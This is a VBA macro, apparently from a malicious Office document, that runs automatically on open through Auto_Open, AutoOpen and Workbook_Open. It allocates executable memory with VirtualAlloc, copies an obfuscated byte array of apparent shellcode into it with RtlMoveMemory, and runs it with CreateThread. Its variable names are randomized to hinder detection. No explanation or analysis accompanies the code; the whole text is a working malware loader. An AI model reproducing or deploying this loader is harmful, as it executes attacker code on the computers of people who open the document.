#If Vba7 Then
	Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Ebcwaogek As Long, ByVal Wwxcoyb As Long, ByVal Qevccoxop As LongPtr, Jwpzhyq As Long, ByVal Mpaywq As Long, Mcdn As Long) As LongPtr
	Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Efrk As Long, ByVal Kkqutemb As Long, ByVal Jbnmxcuvu As Long, ByVal Nbf As Long) As LongPtr
	Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Yqyfcjgpj As LongPtr, ByRef Nxgngq As Any, ByVal Lcabo As Long) As LongPtr
#Else
	Private Declare Function CreateThread Lib "kernel32" (ByVal Ebcwaogek As Long, ByVal Wwxcoyb As Long, ByVal Qevccoxop As Long, Jwpzhyq As Long, ByVal Mpaywq As Long, Mcdn As Long) As Long
	Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Efrk As Long, ByVal Kkqutemb As Long, ByVal Jbnmxcuvu As Long, ByVal Nbf As Long) As Long
	Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Yqyfcjgpj As Long, ByRef Nxgngq As Any, ByVal Lcabo As Long) As Long
#EndIf

Sub Auto_Open()
	Dim Nappjauor As Long, Xhdauh As Variant, Cuurukbww As Long
#If Vba7 Then
	Dim  Wyohklq As LongPtr, Wfjiyf As LongPtr
#Else
	Dim  Wyohklq As Long, Wfjiyf As Long
#EndIf
	Xhdauh = Array(199,217,116,36,244,91,51,201,191,119,172,128,177,177,86,49,123,24,3,123,24,131,235,139,78,117,77,155,13,118,174,91,114,254,75,106,178,100,31,220,2,238,77,208,233,162,101,99,159,106,137,196,42,77,164,213,7,173,167,85,90,226,7,100,149,247,70,161,200,250,27,122,134,169,139,15,210,113,39,67, _
242,241,212,19,245,208,74,40,172,242,109,253,196,186,117,226,225,117,13,208,158,135,199,41,94,43,38,134,173,53,110,32,78,64,134,83,243,83,93,46,47,209,70,136,164,65,163,41,104,23,32,37,197,83,110,41,216,176,4,85,81,55,203,220,33,28,207,133,242,61,86,99,84,65,136,204,9,231,194,224, _
94,154,136,108,146,151,50,108,188,160,65,94,99,27,206,210,236,133,9,99,250,53,197,203,107,200,230,43,165,15,178,123,221,166,187,16,29,70,110,140,23,208,81,248,16,72,58,250,96,151,42,115,134,247,26,211,23,184,202,147,199,80,1,28,55,64,42,247,80,235,197,161,9,132,124,232,194,53,128,39, _
175,118,10,205,79,56,251,164,67,45,156,70,156,174,9,70,246,170,155,17,110,177,250,85,49,74,41,230,54,180,172,222,77,131,58,94,58,236,170,94,186,186,160,94,210,26,145,13,199,100,12,34,84,241,175,18,8,82,216,152,119,148,71,99,82,166,128,155,32,129,40,243,218,145,200,3,177,17,153,107, _
78,61,22,91,175,148,127,243,58,121,205,98,58,80,147,58,59,87,8,205,70,24,175,46,183,48,212,47,183,60,234,12,97,5,152,83,177,50,147,230,148,19,62,8,138,100,107)

	Wyohklq = VirtualAlloc(0, UBound(Xhdauh), &H1000, &H40)
	For Cuurukbww = LBound(Xhdauh) To UBound(Xhdauh)
		Nappjauor = Xhdauh(Cuurukbww)
		Wfjiyf = RtlMoveMemory(Wyohklq + Cuurukbww, Nappjauor, 1)
	Next Cuurukbww
	Wfjiyf = CreateThread(0, 0, Wyohklq, 0, 0, 0)
End Sub
Sub AutoOpen()
	Auto_Open
End Sub
Sub Workbook_Open()
	Auto_Open
End Sub

